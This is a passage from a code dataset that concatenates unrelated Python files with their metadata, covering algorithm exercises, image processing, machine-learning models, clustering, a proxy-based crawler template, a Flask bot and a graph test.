LIS\r\n vec = []\r\n s = set(brr)\r\n for i in arr:\r\n if i in s:\r\n vec.append(i)\r\n res = LongestIncreasingSubsequenceLength(vec)\r\n return abs(N - res) + abs(M - res) \r\n\r\n#{ \r\n# Driver Code Starts\r\n#Initial Template for Python 3\r\n\r\nif __name__ == '__main__': \r\n t = int (input ())\r\n for _ in range (t):\r\n N,M=map(int,input().split())\r\n A=list(map(int,input().split()))\r\n B=list(map(int,input().split()))\r\n \r\n ob = Solution()\r\n print(ob.minInsAndDel(A,B,N,M))\r\n# } Driver Code Ends","sub_path":"Day 30 - 39/33 - Day/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"326427503","text":"# -*- coding: utf-8 -*-\n\"\"\"\nImage manipulation involving symmetry\n=====================================\n\"\"\"\nimport numpy as np\nfrom skimage.transform import rotate\n\nfrom npstreams import average, nan_to_num\n\nfrom ..array_utils import mirror\n\n\ndef nfold(im, mod, center=None, 
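# --- Illustrative sketch (not from the original record): hand-checked examples
# for the patience-sorting LIS and the insert/delete wrapper above.
assert LongestIncreasingSubsequenceLength([3, 1, 2, 5, 4]) == 3  # e.g. 1, 2, 4
# LCS(A, B) found via LIS is 2 ([1, 3] or [1, 5]), so (5-2) + (3-2) = 4 ops.
assert Solution().minInsAndDel([1, 2, 5, 3, 1], [1, 3, 5], 5, 3) == 4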
mask=None, fill_value=0.0):\n \"\"\" \n Returns an images averaged according to n-fold rotational symmetry. This can be used to\n boost the signal-to-noise ratio on an image with known symmetry, e.g. a diffraction pattern.\n\n Parameters\n ----------\n im : array_like, ndim 2\n Image to be azimuthally-symmetrized.\n center : array_like, shape (2,) or None, optional\n Coordinates of the center (in pixels). If ``center=None``, the image is rotated around\n its center, i.e. ``center=(rows / 2 - 0.5, cols / 2 - 0.5)``.\n mod : int\n Fold symmetry number. Valid numbers must be a divisor of 360.\n mask : `~numpy.ndarray` or None, optional\n Mask of `image`. The mask should evaluate to `True` (or 1) on valid pixels. \n If None (default), no mask is used.\n fill_value : float, optional\n In the case of a mask that overlaps with itself when rotationally averaged,\n the overlapping regions will be filled with this value.\n\n Returns\n -------\n out : `~numpy.ndarray`, dtype float\n Symmetrized image.\n\n Raises\n ------\n ValueError : If `mod` is not a divisor of 360 deg.\n \"\"\"\n if 360 % mod:\n raise ValueError(\n \"{}-fold rotational symmetry is not valid (not a divisor of 360).\".format(\n mod\n )\n )\n angles = range(0, 360, int(360 / mod))\n\n # Data-type must be float because of use of NaN\n im = np.array(im, dtype=np.float, copy=True)\n\n if mask is not None:\n im[np.logical_not(mask)] = np.nan\n\n kwargs = {\"center\": center, \"mode\": \"constant\", \"cval\": 0, \"preserve_range\": True}\n\n # Use weights because edges of the pictures, which might be cropped by the rotation\n # should not count in the average\n wt = np.ones_like(im, dtype=np.uint8)\n weights = (rotate(wt, angle, **kwargs) for angle in angles)\n rotated = (rotate(im, angle, **kwargs) for angle in angles)\n\n avg = average(rotated, weights=weights, ignore_nan=True)\n return nan_to_num(avg, fill_value, copy=False)\n\n\ndef reflection(im, angle, center=None, mask=None, fill_value=0.0):\n \"\"\"\n Symmetrize an image according to a reflection plane.\n\n Parameters\n ----------\n im : array_like, ndim 2\n Image to be symmetrized.\n angle : float\n Angle (in degrees) of the line that defines the reflection plane. This angle\n increases counter-clockwise from the positive x-axis. Angles\n larger that 360 are mapped back to [0, 360). Note that ``angle`` and ``angle + 180``\n are equivalent.\n center : array_like, shape (2,) or None, optional\n Coordinates of the center (in pixels). If ``center=None``, the image is rotated around\n its center, i.e. ``center=(rows / 2 - 0.5, cols / 2 - 0.5)``.\n mask : `~numpy.ndarray` or None, optional\n Mask of `image`. The mask should evaluate to `True` (or 1) on valid pixels. 
\n If None (default), no mask is used.\n fill_value : float, optional\n In the case of a mask that overlaps with itself when rotationally averaged,\n the overlapping regions will be filled with this value.\n\n Returns\n -------\n out : `~numpy.ndarray`, dtype float\n Symmetrized image.\n \"\"\"\n angle = float(angle) % 360\n\n # Data-type must be float because of use of NaN\n im = np.array(im, dtype=np.float, copy=True)\n reflected = np.array(im, copy=True) # reflected image\n\n if mask is not None:\n invalid_pixels = np.logical_not(mask)\n im[invalid_pixels] = np.nan\n reflected[invalid_pixels] = np.nan\n\n kwargs = {\"center\": center, \"mode\": \"constant\", \"cval\": 0, \"preserve_range\": True}\n\n # Rotate the 'reflected' image so that the reflection line is the x-axis\n # Flip the image along the y-axis\n # Rotate back to original orientation\n # FIXME: this will not work properly for images that are offcenter\n reflected = rotate(reflected, -angle, **kwargs)\n reflected = mirror(reflected, axes=0)\n reflected = rotate(reflected, angle, **kwargs)\n\n return nan_to_num(average([im, reflected]), fill_value, copy=False)\n","sub_path":"skued/image/symmetry.py","file_name":"symmetry.py","file_ext":"py","file_size_in_byte":4396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"325504935","text":"from gensim.models.doc2vec import Doc2Vec, TaggedDocument\nfrom nltk.tokenize import word_tokenize\nimport csv\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pickle\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report, accuracy_score\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import SVC\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.naive_bayes import GaussianNB\n\n\ndef svm(X_train, X_test, y_train, y_test):\n clf = SVC(C=32768, kernel='rbf', gamma=3.05e-5)\n clf.fit(X_train, y_train)\n\n print(\"SVM Trained\")\n\n pred = clf.predict(X_test)\n print(classification_report(y_test, pred))\n\n print(\"Test Accuracy\")\n print(accuracy_score(y_test, pred))\n\n pred = clf.predict(X_train)\n print(\"Train Accuracy\")\n print(accuracy_score(y_train, pred))\n\n pickle.dump(clf, open('svm2.sav', 'wb+'))\n print(\"Model Saved\")\n\ndef nb(X_train, X_test, y_train, y_test):\n clf = GaussianNB()\n clf.fit(X_train, y_train)\n\n print(\"Naive Bayes Model Trained\")\n\n pred = clf.predict(X_test)\n print(classification_report(y_test, pred))\n\n print(\"Test Accuracy\")\n print(accuracy_score(y_test, pred))\n\n pred = clf.predict(X_train)\n print(\"Train Accuracy\")\n print(accuracy_score(y_train, pred))\n\n pickle.dump(clf, open('nb2.sav', 'wb+'))\n print(\"Model Saved\")\n\n\ndef nn(X_train, X_test, y_train, y_test):\n clf = MLPClassifier(solver='adam', alpha=1,hidden_layer_sizes=(100, 25))\n clf.fit(X_train, y_train)\n\n print(\"Neural Net Trained\")\n\n pred = clf.predict(X_test)\n print(classification_report(y_test, pred))\n\n print(\"Test Accuracy\")\n print(accuracy_score(y_test, pred))\n\n pred = clf.predict(X_train)\n print(\"Train Accuracy\")\n print(accuracy_score(y_train, pred))\n\n pickle.dump(clf, open('nn2.sav', 'wb+'))\n print(\"Model Saved\")\n\n\nif __name__ == '__main__':\n\n\n d = {'happy':0, 'sad':1, 'angry':2, 'others':3}\n colors = ['blue','green','red','yellow']\n\n data = []\n labels= []\n\n with open('train.txt') as csv_file:\n csv_reader = csv.reader(csv_file, 
delimiter='\\t')\n line_count = 0\n for row in csv_reader:\n if(line_count!=0):\n labels.append(d[row[4]])\n line_count+=1\n\n train_vector = np.load('data_vectors_2.npy')\n\n X_train, X_test, y_train, y_test = train_test_split(train_vector, labels, test_size=0.2)\n print(\"Data Split Done....\\n\")\n\n # np.save('X_train', X_train)\n # np.save('X_test', X_test)\n # np.save('y_train', y_train)\n # np.save('y_test', y_test)\n\n\n print(\"\\nSVM Model\")\n svm(X_train, X_test, y_train, y_test)\n\n print(\"\\nNaive Bayes Model\")\n nb(X_train, X_test, y_train, y_test)\n\n # print(\"\\nLogistic Regression Model\")\n # lr(X_train, X_test, y_train, y_test)\n\n print(\"\\nNeural Net\")\n nn(X_train, X_test, y_train, y_test)\n\n\n","sub_path":"classifiers_2.py","file_name":"classifiers_2.py","file_ext":"py","file_size_in_byte":2972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"587838274","text":"# IMPORT OPERATIONS\nimport gp_utilities\nfrom gp_utilities import vector3d as vec\nimport os\nimport variables\n\ndef topo_modify(corners_along_sphere, sphere_surface_group, corners_around_sphere, translation_for_sphere,\n translation_around_sphere, density_between_spheres, density_after_spheres):\n #Topology_Modification\n topo.execute(\"transform_topo -g {} -sg {} -t1 {} {} {}\".format(corners_along_sphere, sphere_surface_group,\n translation_for_sphere.get_component(0),translation_for_sphere.get_component(1),\n translation_for_sphere.get_component(2)))\n topo.execute(\"transform_topo -g {} -t1 {} {} {}\".format(corners_around_sphere, translation_around_sphere.get_component(0),\n translation_around_sphere.get_component(1), translation_around_sphere.get_component(2)))\n\n #Density_Modification_between_spheres\n den = topo.den()\n den.set_density(topo.corner(variables.corners_between_spheres[0]), topo.corner(variables.corners_between_spheres[1]), density_between_spheres)\n den.set_density(topo.corner(variables.corners_between_spheres[1]), topo.corner(variables.corners_between_spheres[2]), density_between_spheres)\n\n #Density_Modification_after_spheres\n den.set_density(topo.corner(variables.corners_after_spheres[0]), topo.corner(variables.corners_after_spheres[1]), density_after_spheres)\n den.set_density(topo.corner(variables.corners_after_spheres[1]), topo.corner(variables.corners_after_spheres[2]), density_after_spheres)\n return topo\n\ndef write_schedule_file():\n #Write_schedule_file\n file = open(\"{}.sch\".format(output_file_prefix), \"w+\")\n file.writelines(\"step {}: -c all 1.0 0 -C all 1.0 24 -r -S {} -w \"\n \"\\nstep {}: -sys 'ws qchk {}.grd 11 10000 {} 120' \"\n \"\\nstep {}: -sys 'python Quality.py {}.sch'\"\n \"\\nwrite -f {}.grd\".format(variables.step_count, variables.sweep_count, variables.step_count+1,\n output_file_prefix, variables.skewness, variables.step_count+2,\n output_file_prefix, output_file_prefix))\n file.close()\n\n\n#Main Function\nif(__name__ == '__main__'):\n topo = gp_utilities.Topology()\n\n #Input_Parameters\n input_file_prefix = \"template\"\n initial_distance = float(10)\n den_between_spheres = 13\n den_after_spheres = 13\n corner_grp_along_sphere = 1\n corner_grp_around_sphere = 2\n sphere_surface_grp = 1\n\n #Topology Modification and Run Ggrid\n for i in range(10, 4, -1):\n topo.read(\"{}.fra\".format(input_file_prefix))\n translation_for_grp_along_sphere = vec(-(initial_distance-i), 0, 0)\n translation_for_grp_around_sphere = vec(-((initial_distance - i) / 2), 0, 0)\n den_between_spheres = 
den_between_spheres-1\n den_after_spheres = den_after_spheres+1\n topo_modify(corner_grp_along_sphere, sphere_surface_grp, corner_grp_around_sphere, translation_for_grp_along_sphere,\n translation_for_grp_around_sphere, den_between_spheres, den_after_spheres)\n output_file_prefix = \"distance_{}units\".format(i)\n topo.write_topology(\"{}.fra\".format(output_file_prefix))\n write_schedule_file()\n Ggrid = \"Ggrid {}.fra\".format(output_file_prefix)\n os.system(Ggrid)","sub_path":"Examples/API4_Tandem_Spheres/Tandem_Spheres.py","file_name":"Tandem_Spheres.py","file_ext":"py","file_size_in_byte":3538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"428172017","text":"import os\nimport random\nimport numpy as np\nimport pandas as pd\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision\n\nfrom data_helper import UnlabeledDataset, LabeledDataset\nfrom helper import collate_fn, draw_box\nfrom torchvision import transforms, models\n\nimport copy\nimport torchgeometry.core as tgm \nclass _DecoderBlock(nn.Module):\n \"\"\"\n Taken from https://github.com/zijundeng/pytorch-semantic-segmentation/blob/master/models/seg_net.py\n \"\"\"\n def __init__(self, in_channels, out_channels, num_conv_layers, out_activation = 'relu'):\n super(_DecoderBlock, self).__init__()\n middle_channels = int(in_channels / 2)\n layers = [\n nn.ConvTranspose2d(in_channels, in_channels, kernel_size=2, stride=2),\n nn.Conv2d(in_channels, middle_channels, kernel_size=3, padding=1),\n nn.BatchNorm2d(middle_channels),\n nn.ReLU(inplace=True)\n ]\n layers += [\n nn.Conv2d(middle_channels, middle_channels, kernel_size=3, padding=1),\n nn.BatchNorm2d(middle_channels),\n nn.ReLU(inplace=True),\n ] * (num_conv_layers - 2)\n layers += [\n nn.Conv2d(middle_channels, out_channels, kernel_size=3, padding=1),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(inplace=True) if out_activation == 'relu' else nn.Sigmoid(),\n ]\n self.decode = nn.Sequential(*layers)\n\n def forward(self, x):\n return self.decode(x)\n \nclass _SameDecoder(nn.Module):\n def __init__(self, in_channels, out_channels, out_activation = 'relu'):\n super(_SameDecoder, self).__init__()\n layers = [\n nn.ConvTranspose2d(in_channels, in_channels, kernel_size=3, stride=3),\n nn.Conv2d(in_channels, out_channels, kernel_size=3, padding=1),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(inplace=True)\n ]\n\n layers += [\n nn.Conv2d(out_channels, out_channels, kernel_size=3, padding=1),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(inplace=True) if out_activation == 'relu' else nn.Sigmoid(),\n ]\n self.decode = nn.Sequential(*layers)\n\n def forward(self, x):\n return self.decode(x)\n\n# pyramid style decoder:\nclass PPMBilinear(nn.Module):\n def __init__(self, num_class=1, fc_dim=256,\n pool_scales=(1, 2, 3, 6), out_size=800):\n super(PPMBilinear, self).__init__()\n self.out_size = out_size\n self.ppm = [nn.Sequential(nn.AdaptiveAvgPool2d(1), \n nn.Conv2d(fc_dim, 256, kernel_size=1, bias= False), \n nn.ReLU(inplace=True))]\n for scale in pool_scales[1:]:\n self.ppm.append(nn.Sequential(nn.AdaptiveAvgPool2d(scale), \n nn.Conv2d(fc_dim, 256, kernel_size=1, bias= False), \n nn.BatchNorm2d(256), \n nn.ReLU(inplace=True)))\n self.ppm = nn.ModuleList(self.ppm)\n\n self.pool_conv = nn.Sequential(\n nn.Conv2d(fc_dim+len(pool_scales)*256, 256,\n kernel_size=3, padding=1, bias=False),\n nn.BatchNorm2d(256),\n nn.ReLU(inplace=True),\n nn.Dropout2d(0.1),\n # nn.Conv2d(512, num_class, kernel_size=1)\n )\n 
self.conv_last = nn.Sequential(*[_SameDecoder(256, 256), \n _DecoderBlock(256, 128, 2),\n _DecoderBlock(128, 64, 2), \n _DecoderBlock(64, 32, 2), \n _DecoderBlock(32, 1, 2, 'Sigmoid')])\n \n # self.sigmoid = nn.Sigmoid()\n def forward(self, conv_out):\n conv5 = conv_out[-1]\n\n input_size = conv5.size()\n \n ppm_out = [conv5]\n for pool_scale in self.ppm:\n ppm_out.append(nn.functional.interpolate(\n pool_scale(conv5),\n (input_size[2], input_size[3]),\n mode='bilinear', align_corners=False))\n ppm_out = torch.cat(ppm_out, 1)\n # print(ppm_out.shape)\n x = self.pool_conv(ppm_out)\n #feat = x\n x =self.conv_last(x)\n # print(x.shape)\n x = nn.functional.interpolate(x, (self.out_size,self.out_size), mode='bilinear', align_corners = False)\n \n return x\n\nclass TransformModule(nn.Module):\n '''\n Modified from https://github.com/pbw-Berwin/View-Parsing-Network/blob/dc0c4250302b84a8594f291a494b5e8969291e1b/segmentTool/models.py\n '''\n def __init__(self, dim1, dim2, num_view = 6):\n super(TransformModule, self).__init__()\n self.num_view = num_view\n self.dim1 = dim1\n self.dim2 = dim2\n self.mat_list = nn.ModuleList()\n \n for i in range(self.num_view):\n # weights are not shared\n fc_transform = nn.Sequential(\n nn.Linear(dim1* dim2, dim1*dim2*4), \n nn.ReLU(), \n nn.Linear(dim1 * dim2*4, dim1*dim2),\n nn.ReLU()\n )\n self.mat_list += [fc_transform]\n \n def forward(self, x):\n # shape B V C H W\n # flatten along the channel\n x = x.view(list(x.size()[:3]) + [self.dim1 * self.dim2,])\n # Transform the first image\n view_comb = self.mat_list[0](x[:, 0])\n for i in range(1, x.size(1)):\n # results are added(fusion func)\n view_comb += self.mat_list[i](x[:, i])\n view_comb = view_comb.view(list(view_comb.size()[:2]) + [self.dim1, self.dim2]) \n return view_comb\n \n\nclass vpn_model(nn.Module):\n def __init__(self, dim1, dim2, encoder, decoder):\n super(vpn_model, self).__init__()\n self.num_views = 6\n self.encoder = encoder\n \n self.transform = TransformModule(dim1=dim1, dim2=dim2)\n \n self.decoder = decoder\n \n \n def forward(self, x, return_feat = False):\n # flatten the output along channel: C x (HW)\n # weights are not shared, i.e. each first view input has\n # own VRM to get its top down view feature map \n # i here in range 6(MN, N=6,M=1(MODALITY))\n # j here in range num_channels\n # \n B,V,C,H,W = x.shape\n x = x.view(B*V, C, H, W)\n x = self.encoder(x)\n # return to B V \n x = x.view([B,V] + list(x.size()[1:]))\n x = self.transform(x) # B x c x h x w\n \n x = self.decoder([x])\n\n return x\n \nclass SpatialTransformer(nn.Module):\n\n def __init__(self, in_channels, kernel_size):\n '''\n Takes input in Bx 1024 x 16 x 20\n '''\n super(SpatialTransformer, self).__init__()\n self._in_ch = in_channels \n self._ksize = kernel_size\n\n self.prep_warper = nn.Sequential(*[\n nn.Conv2d(self._in_ch, 32, kernel_size=self._ksize, stride=1, padding=1, bias=False),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 32, kernel_size=self._ksize, stride=1, padding=1, bias=False),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(2)\n \n ])\n \n self.warper_generator = nn.Sequential(*[\n nn.Linear(32*8*10, 1024), \n nn.ReLU(inplace = True),\n nn.Linear(1024, 9),\n nn.Tanh()\n ])\n\n def forward(self, x): \n \"\"\"\n Forward pass of the STN module. 
\n x -> input feature map \n x should be the feature map for a single view\n \"\"\"\n B, C, H, W = x.shape\n #localization net\n homo_mat = self.prep_warper(x)\n # concatenate 3 dim\n homo_mat = homo_mat.view(B, -1)\n \n homo_mat = self.warper_generator(homo_mat) # BV 3 X3 \n #reshape to homo matrix\n homo_mat = homo_mat.view(-1, 3, 3)\n # grid sample on original view\n warper = tgm.HomographyWarper(H, W)\n warpped = warper(x, homo_mat)\n return warpped\nclass ComplexTransformModule(nn.Module):\n def __init__(self, num_view=6):\n '''\n Takes in input B, V, C, H, W\n '''\n super(ComplexTransformModule, self).__init__()\n \n self.num_view = num_view\n\n self.mat_list = nn.ModuleList()\n \n for i in range(self.num_view):\n self.mat_list += [SpatialTransformer(1024, 3)]\n\n def forward(self, x):\n '''\n Takes in B,V,C,H, W, perform warpping on each image and concatenate by position\n '''\n B, V, C, H, W = x.size()\n view_comb = self.mat_list[0](x[:, 0])\n for i in range(1, V):\n view_comb += self.mat_list[i](x[:, i])\n # for each view, perform the warpped view\n #x[:, i] = self.mat_list[i](x[:, i])\n #Concatenate the view\n # x = position_concat_features(x)\n return view_comb\n\nclass vpn_model_v2(nn.Module):\n def __init__(self, encoder, decoder):\n super(vpn_model_v2, self).__init__()\n self.num_views = 6\n self.encoder = encoder\n \n self.transform = ComplexTransformModule()\n self.decoder = decoder\n \n \n def forward(self, x, return_feat = False):\n # flatten the output along channel: C x (HW)\n # weights are not shared, i.e. each first view input has\n # own VRM to get its top down view feature map \n # i here in range 6(MN, N=6,M=1(MODALITY))\n # j here in range num_channels\n # \n B,V,C,H,W = x.shape\n x = x.view(B*V, C, H, W)\n x = self.encoder(x)\n # return to B V \n x = x.view([B,V] + list(x.size()[1:]))\n \n x = self.transform(x) # B x c x h x w\n \n x = self.decoder([x])\n\n return x","sub_path":"Roadmap/VPN_model.py","file_name":"VPN_model.py","file_ext":"py","file_size_in_byte":9882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"222547780","text":"from math import sqrt\nfrom itertools import combinations\nfrom itertools import product\nfrom collections import Iterable\nimport csv\n\ndef avg(lst):\n return sum(lst) / len(lst)\n\ndef colomn(matrix, i):\n return[row[i] for row in matrix]\n\nclass Clustering:\n linkages = {\"single\": min, \"complete\": max, \"average\": avg}\n\n def __init__(self, file_name, linkage=\"average\"):\n f = open(file_name, \"rt\", encoding=\"latin1\")\n self.t = [[i for i in l] for l in csv.reader(f)] #preberemo podatke v tabelo\n self.header = self.t[0] #si zapomnimo drzave v header\n del self.header[:16]\n self.country = []\n self.data = []\n self.dataArray = []\n self.clusters = []\n self.drzave = {}\n for i in range(1,len(self.t)):\n self.country.append(self.t[i][1])\n self.data.append([float(v) if v else None for v in self.t[i][16:]]) #naredimo tabelo podatkov v katero na prazna mesta vpisemo None\n self.linkage = self.linkages[linkage]\n for i in range(len(self.data[0])):\n self.dataArray.append(colomn(self.data, i)) #obrnemo tabelo podatkov\n self.clusters.append([i])\n self.drzave.update({i: self.header[i]}) #naredimo slovar drzav\n\n def column_distance(self, r1, r2):\n \"\"\"Evklidska razdalja med dvema stolpcema drzav\"\"\"\n euklid = [(x - y) ** 2\n for x, y in zip(r1, r2)\n if (x is not None) and (y is not None)]\n if (len(euklid) > 0):\n return sqrt((sum(euklid))/len(euklid))\n 
else:\n return 999\n\n\n def cluster_distance(self, c1, c2):\n \"\"\"Razdalja med dvema clustroma\"\"\"\n l = []\n for a,b in product(c1,c2): #iteriramo cez vse pare drzav v clustrih c1 in c2\n l.append(self.column_distance(self.dataArray[a], self.dataArray[b]))\n return self.linkage(l) #vrnemo najkrajso razdaljo glede na vrednost v self.linkage\n\n\n def closest_clusters(self):\n \"\"\"Vrne najblizja clustra\"\"\"\n # 1 vrstica, nekaj podobnega temu spodaj\n dist, d = min((self.cluster_distance(*c), c) #iteriramo cez vse pare clustroc in poisemo minimalni par\n for c in combinations(self.clusters, 2))\n return d #vrne par clustrov ki sta najblizja\n\n\n\n def run(self, st_clustrov):\n \"\"\"Izvajanje hierarhicnega clusteringa\"\"\"\n while len(self.clusters) > st_clustrov:\n pair = self.closest_clusters()\n self.clusters = [x for x in self.clusters if x not in pair] + [pair[0] + pair[1]]\n for l in self.clusters:\n for c in l:\n print(self.drzave[c])\n print(\"************\")\n\n\nhc = Clustering(\"eurovision-final.csv\")\nhc.run(3)\n","sub_path":"1. domaca naloga/1. domaca naloga.py","file_name":"1. domaca naloga.py","file_ext":"py","file_size_in_byte":3086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"60582728","text":"#!/usr/bin/env python\n\n'''\nCruzer crawler\n'''\nimport pathlib\nimport logging\nfrom tqdm import tqdm\nfrom subprocess import check_output\nimport time\nimport asyncio\n\n\nimport cocrawler\nfrom cocrawler.task import Task\nfrom cocrawler.req import Req\nfrom cocrawler.urls import URL\nfrom cocrawler.proxy import CruzerProxy, TaskProxy, ProxyChecker, BadProxySignal\nfrom _BIN.tools.logs import Counter\n\n\nclass Dispatcher():\n\n def __init__(self):\n\n self.selector = ['aaaa','aqaa']\n\n self.sel_iter = iter(self.selector)\n self.total = self.get_total()\n\n def __iter__(self):\n return self\n\n def get_total(self):\n return 99\n total = self.selector.count()\n print('--> records selected: {0}'.format(total))\n return total\n\n def __next__(self):\n row = next(self.sel_iter)\n return (row)\n\nclass Cruzer(CruzerProxy):\n\n proxy_task_status = TaskProxy() # do not use task_proxy for name\n cond_html = ('____q' in proxy_task_status.doc.html) # validation condition\n\n checker_status = ProxyChecker(*proxy_task_status.get_cmd(),\n condition=any,\n apply_for_task='all'\n )\n\n proxy_task_body = TaskProxy(need=False) # reverse decision to false, no 'body' should be in html in this example\n body_exp = ('body222' in proxy_task_status.doc.html) # validation condition\n\n checker_body = ProxyChecker(*proxy_task_body.get_cmd(),\n condition=any,\n apply_for_task=['task_download']\n )\n\n#class Cruzer(cocrawler.Crawler):\n\n def task_generator(self):\n\n dis = Dispatcher()\n counter = Counter(dis.total, report_every=10)\n\n for host in dis:\n url = 'http://{0}'.format(host)\n url = 'https://www.google.com'\n counter.count()\n proxy_url = self.proxy_url(url)\n req = Req(proxy_url)\n domain = req.url.hostname_without_www\n\n yield Task(name='download',req=req,domain=domain)\n break\n\n async def task_download(self,task):\n '''\n new proxy can be rotated directly from task by returning:\n return BadProxySignal('--> Proxy is dead bla bla')\n '''\n if task.doc.status == 200:\n\n print('good: {0} , last_url: {1}'.format(task.domain,task.last_url))\n print(task.host_ip)\n else:\n print('bad: {0}, error: {1}'.format(task.domain,task.doc.status))\n pass\n\n\nif __name__ == '__main__':\n '''\n command line args example: \n python3 
cruzer.py\\\n --config Crawl.MaxWorkers:3\\\n --config Crawl.CPUControl:False\\\n --config Crawl.DumpMemory:True\\\n --loglevel INFO\\\n --reuse_session\n '''\n Cruzer.run()\n\n #misc()\n\n\n\n\n\n","sub_path":"scripts/cruzer_proxy.py","file_name":"cruzer_proxy.py","file_ext":"py","file_size_in_byte":2867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"128180049","text":"from flask import Flask, request\n\n# Create your app (web server)\napp = Flask(__name__)\n\nx= 1\n\n# When people visit the home page '/' use the hello_world function\n@app.route('/')\ndef hello_world():\n return 'Hello, World!'\n\n@app.route('/greet', methods=['GET','POST'])\ndef greet_person():\n # Get the value of the 'name' query parameter\n # request.values is a dictionary (cool!)\n name = request.values.get('text')\n # This bot says hi to every name it gets sent!\n return f'hi {name}!'\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"demobot.py","file_name":"demobot.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"558259720","text":"\"\"\"\nIntro to Algo P537-538\n\nBreadth-first trees\nThe procedure BFS builds a breadth-first tree as it searches the graph,\nthe tree is represented by the PI field in each vertex.\n\nThe predecessor subgraph G(PI) is a breadth-first tree if V(PI) consists\nof vertices reachable from s and, for all v in V(PI), there is a unique\nsimple path from s to v in G(PI) that is also a shortest path from s\nto v in G.\n\n|E(PI)| = |V(PI)| - 1\n\nthe edges in E(PI) are called tree edges.\n\nsee exercises 22.2-7 P539\nthe diameter of a tree T = (V, E) is given by\nthe max of all the shortest path between u, v\nthe max of the height of the bfs tree for each v\n\n########################################################################\n\nsource of the test\n\nhttps://www.geeksforgeeks.org/shortest-path-unweighted-graph/\n\nSince the graph is unweighted, we can solve this problem in O(V + E)\ntime. The idea is to use a modified version of Breadth-first search in\nwhich we keep storing the predecessor of a given vertex while doing the\nbreadth first search. This algorithm will work even when negative weight\ncycles are present in the graph.\n\n\n add_edge(adj, 0, 1);\n add_edge(adj, 0, 3);\n add_edge(adj, 1, 2);\n add_edge(adj, 3, 4);\n add_edge(adj, 3, 7);\n add_edge(adj, 4, 5);\n add_edge(adj, 4, 6);\n add_edge(adj, 4, 7);\n add_edge(adj, 5, 6);\n add_edge(adj, 6, 7);\n int source = 0, dest = 7;\n printShortestDistance(adj, source, dest, v);\n return 0;\nShortest path length is : 2\nPath is::\n0 3 7\n\"\"\"\n\nimport unittest\n\nfrom plain_dag import PlainDag\nfrom bellman_ford_unweighted.v1 import find_shortest_path\n\n\nclass TestShortestPath(unittest.TestCase):\n\n def test_(self):\n node_by_value = dict()\n _ = PlainDag.create_from_string(\n \"\"\"\n 0->1\n 0->3\n 1->2\n 3->4\n 3->7\n 4->5\n 4->6\n 4->7\n 5->6\n 6->7\n \"\"\", o_dict=node_by_value\n )\n src = node_by_value['0']\n dest = node_by_value['7']\n p = find_shortest_path(src, dest)\n self.assertTrue(p)\n self.assertSequenceEqual(\n '037', ''.join([n.value for n in p])\n )\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"graph/test_bellman_ford_unweighted.py","file_name":"test_bellman_ford_unweighted.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"512172710","text":"\"\"\"Various internal-only utility functions for seedy.\"\"\"\n\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport platform\n\n# The currently-running system.\n_system = platform.system()\n\ndef format_human_readable(size, precision=1):\n \"\"\"Format a byte count as a human-readable string.\n\n The conversion tries to respect the conventions of the running\n platform. For example, OS X (Darwin) systems define a KB as 1000B,\n while pretty much everyone else defines it as 1024B.\n\n :param: size a number specifying some number of bytes\n :type: size non-negative int, float, or convertible equivalent\n :return: a formatted human-readable string representing the input\n size\n \"\"\"\n\n # Set definition of suffixes, depending on the system.\n if _system == "Darwin":\n dividand = 1000.0\n else:\n dividand = 1024.0\n\n # Check sign of input.\n if size < 0:\n raise ValueError(\"Negative size (\" + str(size) + \").\")\n\n # Progressively step up through the suffixes.\n size = float(size)\n for suffix in ['B ','KB','MB','GB','TB','PB','EB','ZB']:\n if size < dividand:\n format_str = '\%5.%sf\%s' % str(precision)\n return format_str % (size, suffix)\n size /= dividand\n\n # Default to yottabytes. 
(What's it like in the future?)\n format_str = '\\%.%sf\\%s' % str(precision)\n return \"%.1f%s\" % (size, 'YB')\n","sub_path":"seedy/_utility.py","file_name":"_utility.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"627375434","text":"# Python script to prepare integration-prepare-gatkhc-v3.3.1-anyref files\n\n#Adjust file name for desired output name\nout = open(\"161107_integration-prepare-gatkhc-v3.3.2-anyref_ILMN_script.sh\", \"w\") \n\n#Set all of these values as appropriate \nHG = \"HG001\"\t\t#genome\nplat= \"Illumina\" #platform\nabv = \"Ilmn\" #abreviated platform name\ncc = \"150bp300x\" #chemistry and/or coverage\nmap = \"novoalign\" #mapper\nref = \"/assets/GRCh38hs38d1noalt.fasta-index.tar.gz\"\n\nchr = 1 \nfor i in range(22): \n\t\n\tout.write(\"dx run -y GIAB:/Workflow/integration-prepare-gatkhc-v3.3.2-anyref \" +\n\t \t\n\t\t\"-igvcf=/\"+HG+\"/GRCh38/\"+ plat +\"/GATKHC_output/\" + HG + \"_\" + str(chr) + 